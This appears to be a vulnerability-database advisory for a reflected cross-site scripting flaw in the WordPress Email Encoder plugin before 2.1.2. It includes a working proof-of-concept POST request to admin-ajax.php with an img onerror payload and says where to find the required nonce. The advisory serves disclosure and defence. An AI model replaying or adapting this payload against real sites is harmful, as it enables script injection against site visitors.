Lucene search

K
wpexploitDc11WPEX-ID:625A272F-5C69-4F6A-8EEE-32F70CD4A558
HistoryAug 02, 2021 - 12:00 a.m.

Email Encoder < 2.1.2 - Reflected Cross Site Scripting

2021-08-0200:00:00
dc11
279

0.001 Low

EPSS

Percentile

43.2%

The plugin has an endpoint that requires no authentication and will render a user supplied value in the HTML response without escaping or sanitizing the data.

The vulnerable function is nonce protected, the nonce can be found in the site's HTML source by searching for the javascript variable "eeb_ef" 

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://127.0.0.1:8080
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:8080/
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1

action=eeb_get_email_form_output&eebsec=<your nonce here>&eebMethod=escape&eebDisplay=&lt;img src=1 onerror=alert(1)&gt;

0.001 Low

EPSS

Percentile

43.2%

Related for WPEX-ID:625A272F-5C69-4F6A-8EEE-32F70CD4A558